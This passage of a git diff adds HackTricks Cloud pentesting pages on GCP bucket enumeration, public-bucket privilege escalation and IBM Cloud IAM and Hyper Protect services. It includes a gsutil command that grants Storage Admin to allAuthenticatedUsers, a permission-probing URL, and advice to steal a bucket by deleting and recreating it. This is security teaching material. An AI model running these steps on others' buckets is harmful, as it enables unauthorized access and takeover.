+* if this source repository is used by other GCP services, they could get compromised
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md
new file mode 100644
index 0000000000..39f682aa70
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md
@@ -0,0 +1,99 @@
+# GCP - Storage Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Storage
+
+For more information about Storage check:
+
+{% content-ref url="../../gcp-services/gcp-storage-enum.md" %}
+[gcp-storage-enum.md](../../gcp-services/gcp-storage-enum.md)
+{% endcontent-ref %}
+
+### Public Bucket Brute Force
+
+The **format of an URL** to access a bucket is **`https://storage.googleapis.com/<bucket-name>`.**
+
+The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:
+
+* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute)
+
+**Also the tools** mentioned in:
+
+{% content-ref url="../" %}
+[..](../)
+{% endcontent-ref %}
+
+If you find that you can **access a bucket** you might be able to **escalate even further**, check:
+
+{% content-ref url="gcp-public-buckets-privilege-escalation.md" %}
+[gcp-public-buckets-privilege-escalation.md](gcp-public-buckets-privilege-escalation.md)
+{% endcontent-ref %}
+
+### Search Open Buckets in Current Account
+
+With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_buckets.sh) you can find all the open buckets:
+
+```bash
+#!/bin/bash
+
+############################
+# Run this tool to find buckets that are open to the public anywhere
+# in your GCP organization.
+#
+# Enjoy!
+############################
+
+for proj in $(gcloud projects list --format="get(projectId)"); do
+    echo "[*] scraping project $proj"
+    for bucket in $(gsutil ls -p $proj); do
+        echo "    $bucket"
+        ACL="$(gsutil iam get $bucket)"
+
+        all_users="$(echo $ACL | grep allUsers)"
+        all_auth="$(echo $ACL | grep allAuthenticatedUsers)"
+
+        if [ -z "$all_users" ]
+        then
+              :
+        else
+              echo "[!] Open to all users: $bucket"
+        fi
+
+        if [ -z "$all_auth" ]
+        then
+              :
+        else
+              echo "[!] Open to all authenticated users: $bucket"
+        fi
+    done
+done
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md
new file mode 100644
index 0000000000..bd3d71db24
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md
@@ -0,0 +1,57 @@
+# GCP - Public Buckets Privilege Escalation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Buckets Privilege Escalation
+
+If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access.
+
+### Check Permissions
+
+There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`.
+
+However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work.
+
+The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update`
+
+### Escalating
+
+In order to grant `Storage Admin` to `allAuthenticatedUsers` it's possible to run:
+
+```bash
+gsutil iam ch allAuthenticatedUsers:admin gs://BUCKET_NAME
+```
+
+Another attack would be to **remove the bucket an d recreate it in your account to steal th ownership**.
+
+## References
+
+* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/ibm-cloud-pentesting/README.md b/pentesting-cloud/ibm-cloud-pentesting/README.md
new file mode 100644
index 0000000000..caf2dee60a
--- /dev/null
+++ b/pentesting-cloud/ibm-cloud-pentesting/README.md
@@ -0,0 +1,62 @@
+# IBM Cloud Pentesting
+
+## IBM Cloud Pentesting
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### What is IBM cloud? (By chatGPT)
+
+IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud.
+
+When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches:
+
+1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele.
+2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ.
+3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform.
+4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud.
+
+#### Basic Information
+
+For some basic information about IAM and hierarchi check:
+
+{% content-ref url="ibm-basic-information.md" %}
+[ibm-basic-information.md](ibm-basic-information.md)
+{% endcontent-ref %}
+
+### SSRF
+
+Learn how you can access the medata endpoint of IBM in the following page:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0" %}
+
+## References
+
+* [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:\~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md b/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md
new file mode 100644
index 0000000000..034d4fa02d
--- /dev/null
+++ b/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md
@@ -0,0 +1,99 @@
+# IBM - Basic Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Hierarchy
+
+IBM Cloud resource model ([from the docs](https://www.ibm.com/blog/announcement/introducing-ibm-cloud-enterprises/)):
+
+<figure><img src="../../.gitbook/assets/image (225).png" alt=""><figcaption></figcaption></figure>
+
+Recommended way to divide projects:
+
+<figure><img src="../../.gitbook/assets/image (239).png" alt=""><figcaption></figcaption></figure>
+
+## IAM
+
+<figure><img src="../../.gitbook/assets/image (266).png" alt=""><figcaption></figcaption></figure>
+
+### Users
+
+Users have an **email** assigned to them. They can access the **IBM console** and also **generate API keys** to use their permissions programatically.\
+**Permissions** can be granted **directly** to the user with an access policy or via an **access group**.
+
+### Trusted Profiles
+
+These are **like the Roles of AWS** or service accounts from GCP. It's possible to **assign them to VM** instances and access their **credentials via metadata**, or even **allow Identity Providers** to use them in order to authenticate users from external platforms.\
+**Permissions** can be granted **directly** to the trusted profile with an access policy or via an **access group**.
+
+### Service IDs
+
+This is another option to allow applications to **interact with IBM cloud** and perform actions. In this case, instead of assign it to a VM or Identity Provider an **API Key can be used** to interact with IBM in a **programatic** way.\
+**Permissions** can be granted **directly** to the service id with an access policy or via an **access group**.
+
+### Identity Providers
+
+External **Identity Providers** can be configured to **access IBM cloud** resources from external platforms by accessing **trusting Trusted Profiles**.
+
+### Access Groups
+
+In the same access group **several users, trusted profiles & service ids** can be present. Each principal in the access group will **inherit the access group permissions**.\
+**Permissions** can be granted **directly** to the trusted profile with an access policy.\
+An **access group cannot be a member** of another access group.
+
+### Roles
+
+A role is a **set of granular permissions**. **A role** is dedicated to **a service**, meaning that it will only contain permissions of that service.\
+**Each service** of IAM will already have some **possible roles** to choose from to **grant a principal access to that service**: **Viewer, Operator, Editor, Administrator** (although there could be more).
+
+Role permissions are given via access policies to principals, so if you need to give for example a **combination of permissions** of a service of **Viewer** and **Administrator**, instead of giving those 2 (and overprivilege a principal), you can **create a new role** for the service and give that new role the **granular permissions you need**.
+
+### Access Policies
+
+Access policies allows to **attach 1 or more roles of 1 service to 1 principal**.\
+When creating the policy you need to choose:
+
+* The **service** where permissions will be granted
+* **Affected resources**
+* Service & Platform **access** that will be granted
+  * These indicate the **permissions** that will be given to the principal to perform actions. If any **custom role** is created in the service you will also be able to choose it here.
+* **Conditions** (if any) to grant the permissions
+
+{% hint style="info" %}
+To grant access to several services to a user, you can generate several access policies
+{% endhint %}
+
+<figure><img src="../../.gitbook/assets/image (248).png" alt=""><figcaption></figcaption></figure>
+
+## References
+
+* [https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises](https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises)
+* [https://cloud.ibm.com/docs/account?topic=account-iamoverview](https://cloud.ibm.com/docs/account?topic=account-iamoverview)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md b/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md
new file mode 100644
index 0000000000..074dce60ff
--- /dev/null
+++ b/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md
@@ -0,0 +1,55 @@
+# IBM - Hyper Protect Crypto Services
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+IBM Hyper Protect Crypto Services is a cloud service that provides **highly secure and tamper-resistant cryptographic key management and encryption capabilities**. It is designed to help organizations protect their sensitive data and comply with security and privacy regulations such as GDPR, HIPAA, and PCI DSS.
+
+Hyper Protect Crypto Services uses **FIPS 140-2 Level 4 certified hardware security modules** (HSMs) to store and protect cryptographic keys. These HSMs are designed to r**esist physical tampering** and provide high levels of **security against cyber attacks**.
+
+The service provides a range of cryptographic services, including key generation, key management, digital signature, encryption, and decryption. It supports industry-standard cryptographic algorithms such as AES, RSA, and ECC, and can be integrated with a variety of applications and services.
+
+### What is a Hardware Security Module
+
+A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system.
+
+The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur:
+
+1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator.
+2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**.
+3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation.
+4. **Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering.
+5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes.
+
+HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government.
+
+Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md b/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md
new file mode 100644
index 0000000000..2c1d42d692
--- /dev/null
+++ b/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md
@@ -0,0 +1,68 @@
+# IBM - Hyper Protect Virtual Server
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Hyper Protect Virtual Server is a **virtual server** offering from IBM that is designed to provide a **high level of security and compliance** for sensitive workloads. It runs on **IBM Z and LinuxONE hardware**, which are designed for high levels of security and scalability.
+
+Hyper Protect Virtual Server uses **advanced security features** such as secure boot, encrypted memory, and tamper-proof virtualization to protect sensitive data and applications. It also provides a **secure execution environment that isolates each workload from other workloads** running on the same system.
+
+This virtual server offering is designed for workloads that require the highest levels of security and compliance, such as financial services, healthcare, and government. It allows organizations to run their sensitive workloads in a virtual environment while still meeting strict security and compliance requirements.
+
+### Metadata & VPC
+
+When you run a server like this one from the IBM service called "Hyper Protect Virtual Server" it **won't** allow you to configure **access to metadata,** link any **trusted profile**, use **user data**, or even a **VPC** to place the server in.
+
+However, it's possible to **run a VM in a IBM Z linuxONE hardware** from the service "**Virtual server for VPC**" which will allow you to **set those configs** (metadata, trusted profiles, VPC...).
+
+### IBM Z and LinuxONE
+
+If you don't understand this terms chatGPT can help you understanding them.
+
+**IBM Z is a family of mainframe computers** developed by IBM. These systems are designed for **high-performance, high-availability, and high-security** enterprise computing. IBM Z is known for its ability to handle large-scale transactions and data processing workloads.
+
+**LinuxONE is a line of IBM Z** mainframes that are optimized for **running Linux** workloads. LinuxONE systems support a wide range of open-source software, tools, and applications. They provide a highly secure and scalable platform for running mission-critical workloads such as databases, analytics, and machine learning.
+
+**LinuxONE** is built on the **same hardware** platform as **IBM Z**, but it is **optimized** for **Linux** workloads. LinuxONE systems support multiple virtual servers, each of which can run its own instance of Linux. These virtual servers are isolated from each other to ensure maximum security and reliability.
+
+### LinuxONE vs x64
+
+LinuxONE is a family of mainframe computers developed by IBM that are optimized for running Linux workloads. These systems are designed for high levels of security, reliability, scalability, and performance.
+
+Compared to x64 architecture, which is the most common architecture used in servers and personal computers, LinuxONE has some unique advantages. Some of the key differences are:
+
+1. **Scalability**: LinuxONE can support massive amounts of processing power and memory, which makes it ideal for large-scale workloads.
+2. **Security**: LinuxONE has built-in security features that are designed to protect against cyber threats and data breaches. These features include hardware encryption, secure boot, and tamper-proof virtualization.
+3. **Reliability**: LinuxONE has built-in redundancy and failover capabilities that help ensure high availability and minimize downtime.
+4. **Performance**: LinuxONE can deliver high levels of performance for workloads that require large amounts of processing power, such as big data analytics, machine learning, and AI.
+
+Overall, LinuxONE is a powerful and secure platform that is well-suited for running large-scale, mission-critical workloads that require high levels of performance and reliability. While x64 architecture has its own advantages, it may not be able to provide the same level of scalability, security, and reliability as LinuxONE for certain workloads.\\
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/README.md b/pentesting-cloud/kubernetes-security/README.md
new file mode 100644
index 0000000000..c7b6d358f7
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/README.md
@@ -0,0 +1,106 @@
+# Kubernetes Pentesting
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
